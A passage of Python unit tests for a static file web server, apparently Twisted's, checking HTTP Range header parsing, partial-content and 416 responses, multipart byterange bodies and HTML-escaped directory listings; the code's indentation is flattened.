request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-length': b'%d' % (length,),
b'content-encoding': networkString(contentEncoding)},
self.contentHeaders(request))
def test_singleRangeGivesSingleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_singleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(b'abcdef', type=contentType, encoding=contentEncoding)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-encoding': networkString(contentEncoding),
b'content-range': b'bytes 1-3/6', b'content-length': b'3'},
self.contentHeaders(request))
def test_singleUnsatisfiableRangeReturnsSingleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleUnsatisfiableRangeSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_singleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'0',
b'content-range': b'bytes */3'},
self.contentHeaders(request))
def test_singlePartiallyOverlappingRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=2-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'1',
b'content-range': b'bytes 2-2/3'},
self.contentHeaders(request))
def test_multipleRangeGivesMultipleRangeStaticProducer(self):
"""
makeProducer when the Range header requests multiple byte ranges
returns an instance of MultipleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_mutipleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple satisfiable byte
ranges sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(
b'abcdefghijkl', encoding='gzip')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
contentHeaders = self.contentHeaders(request)
# The only content-* headers set are content-type and content-length.
self.assertEqual(
set([b'content-length', b'content-type']),
set(contentHeaders.keys()))
# The content-length depends on the boundary used in the response.
expectedLength = 5
for boundary, offset, size in producer.rangeInfo:
expectedLength += len(boundary)
self.assertEqual(b'%d' % (expectedLength,),
contentHeaders[b'content-length'])
# Content-type should be set to a value indicating a multipart
# response and the boundary used to separate the parts.
self.assertIn(b'content-type', contentHeaders)
contentType = contentHeaders[b'content-type']
self.assertNotIdentical(
None, re.match(
br'multipart/byteranges; boundary="[^"]*"\Z', contentType))
# Content-encoding is not set in the response to a multiple range
# response, which is a bit wussy but works well enough with the way
# static.File does content-encodings...
self.assertNotIn(b'content-encoding', contentHeaders)
def test_multipleUnsatisfiableRangesReturnsMultipleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{MultipleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleUnsatisfiableRangesSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
none of which are satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_multipleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-length': b'0',
b'content-range': b'bytes */3',
b'content-type': b'text/plain'},
self.contentHeaders(request))
def test_oneSatisfiableRangeIsEnough(self):
"""
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,100-200')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
class StaticProducerTests(TestCase):
"""
Tests for the abstract L{StaticProducer}.
"""
def test_stopProducingClosesFile(self):
"""
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
"""
fileObject = StringIO()
producer = static.StaticProducer(None, fileObject)
producer.stopProducing()
self.assertTrue(fileObject.closed)
def test_stopProducingSetsRequestToNone(self):
"""
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
"""
fileObject = StringIO()
producer = static.StaticProducer(DummyRequest([]), fileObject)
producer.stopProducing()
self.assertIdentical(None, producer.request)
class NoRangeStaticProducerTests(TestCase):
"""
Tests for L{NoRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{NoRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.NoRangeStaticProducer(None, None))
def test_resumeProducingProducesContent(self):
"""
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual(content, b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'a' * (2*bufferSize + 1)
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
expected = [
content[0:bufferSize],
content[bufferSize:2*bufferSize],
content[2*bufferSize:]
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.NoRangeStaticProducer(
request, StringIO(b'abcdef'))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class SingleRangeStaticProducerTests(TestCase):
"""
Tests for L{SingleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{SingleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.SingleRangeStaticProducer(None, None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, 3)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(content[1:4], b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'abc' * bufferSize
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, bufferSize+10)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
content[1:bufferSize+1],
content[bufferSize+1:bufferSize+11],
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.SingleRangeStaticProducer(
request, StringIO(b'abcdef'), 1, 1)
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class MultipleRangeStaticProducerTests(TestCase):
"""
Tests for L{MultipleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.MultipleRangeStaticProducer(None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.MultipleRangeStaticProducer(
request, StringIO(content), [(b'1', 1, 3), (b'2', 5, 1)])
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(b'1bcd2f', b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
"""
request = DummyRequest([])
content = b'0123456789' * 2
producer = static.MultipleRangeStaticProducer(
request, StringIO(content),
[(b'a', 0, 2), (b'b', 5, 10), (b'c', 0, 0)])
producer.bufferSize = 10
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
b'a' + content[0:2] + b'b' + content[5:11],
content[11:15] + b'c',
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.MultipleRangeStaticProducer(
request, StringIO(b'abcdef'), [(b'', 1, 2)])
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class RangeTests(TestCase):
"""
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
"""
def setUp(self):
"""
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
"""
path = FilePath(self.mktemp())
# This is just a jumble of random stuff. It's supposed to be a good
# set of data for this test, particularly in order to avoid
# accidentally seeing the right result by having a byte sequence
# repeated at different locations or by having byte values which are
# somehow correlated with their position in the string.
self.payload = (b'\xf8u\xf3E\x8c7\xce\x00\x9e\xb6a0y0S\xf0\xef\xac\xb7'
b'\xbe\xb5\x17M\x1e\x136k{\x1e\xbe\x0c\x07\x07\t\xd0'
b'\xbckY\xf5I\x0b\xb8\x88oZ\x1d\x85b\x1a\xcdk\xf2\x1d'
b'&\xfd%\xdd\x82q/A\x10Y\x8b')
path.setContent(self.payload)
self.file = path.open()
self.resource = static.File(self.file.name)
self.resource.isLeaf = 1
self.request = DummyRequest([b''])
self.request.uri = self.file.name
self.catcher = []
log.addObserver(self.catcher.append)
def tearDown(self):
"""
Clean up the resource file and the log observer.
"""
self.file.close()
log.removeObserver(self.catcher.append)
def _assertLogged(self, expected):
"""
Asserts that a given log message occurred with an expected message.
"""
logItem = self.catcher.pop()
self.assertEqual(logItem["message"][0], expected)
self.assertEqual(
self.catcher, [], "An additional log occurred: %r" % (logItem,))
def test_invalidRanges(self):
"""
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
"""
f = self.resource._parseRangeHeader
# there's no =
self.assertRaises(ValueError, f, b'bytes')
# unknown isn't a valid Bytes-Unit
self.assertRaises(ValueError, f, b'unknown=1-2')
# there's no - in =stuff
self.assertRaises(ValueError, f, b'bytes=3')
# both start and end are empty
self.assertRaises(ValueError, f, b'bytes=-')
# start isn't an integer
self.assertRaises(ValueError, f, b'bytes=foo-')
# end isn't an integer
self.assertRaises(ValueError, f, b'bytes=-foo')
# end isn't equal to or greater than start
self.assertRaises(ValueError, f, b'bytes=5-4')
def test_rangeMissingStop(self):
"""
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and L{None}.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=0-'), [(0, None)])
def test_rangeMissingStart(self):
"""
A single bytes range without an explicit start position is parsed into
a two-tuple of L{None} and the end position.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=-3'), [(None, 3)])
def test_range(self):
"""
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=2-5'), [(2, 5)])
def test_rangeWithSpace(self):
"""
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
"""
self.assertEqual(
self.resource._parseRangeHeader(b' bytes=1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes =1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes= 1-2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1 -2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1- 2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2 '), [(1, 2)])
def test_nullRangeElements(self):
"""
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,\r\n, ,\t'), [(1, 2)])
def test_multipleRanges(self):
"""
If multiple byte ranges are specified their starts and stops are
returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,3-4'),
[(1, 2), (3, 4)])
def test_bodyLength(self):
"""
A correct response to a range request is as long as the length of the
requested range.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=0-43')
self.resource.render(self.request)
self.assertEqual(len(b''.join(self.request.written)), 44)
def test_invalidRangeRequest(self):
"""
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character and a specific range; only
'bytes' is defined as a Bytes-Unit) results in the range header value
being logged and a normal 200 response being sent.
"""
range = b'foobar=0-43'
self.request.requestHeaders.addRawHeader(b'range', range)
self.resource.render(self.request)
expected = "Ignoring malformed Range header %r" % (range.decode(),)
self._assertLogged(expected)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def parseMultipartBody(self, body, boundary):
"""
Parse C{body} as a multipart MIME response separated by C{boundary}.
Note that this will fail the calling test on certain syntactic
problems.
"""
sep = b"\r\n--" + boundary
parts = body.split(sep)
self.assertEqual(b'', parts[0])
self.assertEqual(b'--\r\n', parts[-1])
parsed_parts = []
for part in parts[1:-1]:
before, header1, header2, blank, partBody = part.split(b'\r\n', 4)
headers = header1 + b'\n' + header2
self.assertEqual(b'', before)
self.assertEqual(b'', blank)
partContentTypeValue = re.search(
b'^content-type: (.*)$', headers, re.I|re.M).group(1)
start, end, size = re.search(
b'^content-range: bytes ([0-9]+)-([0-9]+)/([0-9]+)$',
headers, re.I|re.M).groups()
parsed_parts.append(
{b'contentType': partContentTypeValue,
b'contentRange': (start, end, size),
b'body': partBody})
return parsed_parts
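# Illustrative sketch of the part layout this helper expects (derived from the
# split logic above, not quoted from any specification): each element of
# parts[1:-1] looks roughly like
#   \r\nContent-Type: text/plain\r\nContent-Range: bytes 0-2/64\r\n\r\n<payload>
# i.e. an empty "before" segment, two headers, a blank line, then the body.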
def test_multipleRangeRequest(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response.
"""
startEnds = [(0, 2), (20, 30), (40, 50)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), e)
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_multipleRangeRequestWithRangeOverlappingEnd(self):
"""
The response to a request for multiple bytes ranges is a MIME-ish
multipart response, even when one of the ranges falls off the end of
the resource.
"""
startEnds = [(0, 2), (40, len(self.payload) + 10)]
rangeHeaderValue = b','.join([networkString("%s-%s" % (s,e)) for (s, e) in startEnds])
self.request.requestHeaders.addRawHeader(b'range',
b'bytes=' + rangeHeaderValue)
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
b'^multipart/byteranges; boundary="(.*)"$',
self.request.responseHeaders.getRawHeaders(b'content-type')[0]).group(1)
parts = self.parseMultipartBody(b''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(networkString(self.resource.type),
part[b'contentType'])
start, end, size = part[b'contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), min(e, self.resource.getFileSize()-1))
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part[b'body'])
def test_implicitEnd(self):
"""
If the end byte position is omitted, the range is treated as extending
to the last byte of the resource.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=23-')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[23:])
self.assertEqual(len(b''.join(self.request.written)), 41)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 23-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'41')
def test_implicitStart(self):
"""
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=-17')
self.resource.render(self.request)
self.assertEqual(b''.join(self.request.written), self.payload[-17:])
self.assertEqual(len(b''.join(self.request.written)), 17)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 47-63/64')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'17')
def test_explicitRange(self):
"""
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (and includes) the B'th byte. The first
byte of a page is numbered 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=3-43')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[3:44])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 3-43/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_explicitRangeOverlappingEnd(self):
"""
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered 0.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=40-100')
self.resource.render(self.request)
written = b''.join(self.request.written)
self.assertEqual(written, self.payload[40:])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
b'bytes 40-63/64')
self.assertEqual(
b'%d' % (len(written),),
self.request.responseHeaders.getRawHeaders(b'content-length')[0])
def test_statusCodeRequestedRangeNotSatisfiable(self):
"""
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=20-13')
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(b''.join(self.request.written), self.payload)
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'%d' % (len(self.payload),))
def test_invalidStartBytePos(self):
"""
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=67-108')
self.resource.render(self.request)
self.assertEqual(
self.request.responseCode, http.REQUESTED_RANGE_NOT_SATISFIABLE)
self.assertEqual(b''.join(self.request.written), b'')
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-length')[0],
b'0')
# Sections 10.4.17 and 14.16
self.assertEqual(
self.request.responseHeaders.getRawHeaders(b'content-range')[0],
networkString('bytes */%d' % (len(self.payload),)))
class DirectoryListerTests(TestCase):
"""
Tests for L{static.DirectoryLister}.
"""
def _request(self, uri):
request = DummyRequest([b''])
request.uri = uri
return request
def test_renderHeader(self):
"""
L{static.DirectoryLister} prints the request uri as header of the
rendered content.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
self.assertIn(b"<h1>Directory listing for foo</h1>", data)
self.assertIn(b"<title>Directory listing for foo</title>", data)
def test_renderUnquoteHeader(self):
"""
L{static.DirectoryLister} unquotes the request uri before printing it.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%20bar'))
self.assertIn(b"<h1>Directory listing for foo bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo bar</title>", data)
def test_escapeHeader(self):
"""
L{static.DirectoryLister} escapes "&", "<" and ">" after unquoting the
request uri.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo%26bar'))
self.assertIn(b"<h1>Directory listing for foo&bar</h1>", data)
self.assertIn(b"<title>Directory listing for foo&bar</title>", data)
def test_renderFiles(self):
"""
L{static.DirectoryLister} is able to list all the files inside a
directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1').setContent(b"content1")
path.child('file2').setContent(b"content2" * 1000)
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="file1">file1</a></td>
<td>8B</td>
<td>[text/html]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="file2">file2</a></td>
<td>7K</td>
<td>[text/html]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderDirectories(self):
"""
L{static.DirectoryLister} is able to list all the directories inside
a directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2 & 3').makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir2%20%26%203/">dir2 & 3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderFiltered(self):
"""
L{static.DirectoryLister} takes an optional C{dirs} argument that
filters the list of directories and files printed.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2').makedirs()
path.child('dir3').makedirs()
lister = static.DirectoryLister(path.path, dirs=["dir1", "dir3"])
data = lister.render(self._request(b'foo'))
body = b"""<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir3/">dir3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_oddAndEven(self):
"""
L{static.DirectoryLister} gives alternating classes to the odd and
even rows in the table.
"""
lister = static.DirectoryLister(None)
elements = [{"href": "", "text": "", "size": "", "type": "",
"encoding": ""} for i in range(5)]
content = lister._buildTableContent(elements)
self.assertEqual(len(content), 5)
self.assertTrue(content[0].startswith('<tr class="odd">'))
self.assertTrue(content[1].startswith('<tr class="even">'))
self.assertTrue(content[2].startswith('<tr class="odd">'))
self.assertTrue(content[3].startswith('<tr class="even">'))
self.assertTrue(content[4].startswith('<tr class="odd">'))
def test_contentType(self):
"""
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
req = self._request(b'')
lister.render(req)
self.assertEqual(req.responseHeaders.getRawHeaders(b'content-type')[0],
b"text/html; charset=utf-8")
def test_mimeTypeAndEncodings(self):
"""
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1.txt').setContent(b"file1")
path.child('file2.py').setContent(b"python")
path.child('file3.conf.gz').setContent(b"conf compressed")
path.child('file4.diff.bz2').setContent(b"diff compressed")
directory = os.listdir(path.path)
directory.sort()
contentTypes = {
".txt": "text/plain",
".py": "text/python",
".conf": "text/configuration",
".diff": "text/diff"
}
lister = static.DirectoryLister(path.path, contentTypes=contentTypes)
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [
{'encoding': '',
'href': 'file1.txt',
'size': '5B',
'text': 'file1.txt',
'type': '[text/plain]'},
{'encoding': '',
'href': 'file2.py',
'size': '6B',
'text': 'file2.py',
'type': '[text/python]'},
{'encoding': '[gzip]',
'href': 'file3.conf.gz',
'size': '15B',
'text': 'file3.conf.gz',
'type': '[text/configuration]'},
{'encoding': '[bzip2]',
'href': 'file4.diff.bz2',
'size': '15B',
'text': 'file4.diff.bz2',
'type': '[text/diff]'}])
@skipIf(not platform._supportsSymlinks(), "No symlink support")
def test_brokenSymlink(self):
"""
If a file in the listing points to a broken symlink, it should not
be returned by L{static.DirectoryLister._getFilesAndDirectories}.
"""
path = FilePath(self.mktemp())
path.makedirs()
file1 = path.child('file1')
file1.setContent(b"file1")
file1.linkTo(path.child("file2"))
file1.remove()
lister = static.DirectoryLister(path.path)
directory = os.listdir(path.path)
directory.sort()
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [])
def test_childrenNotFound(self):
"""
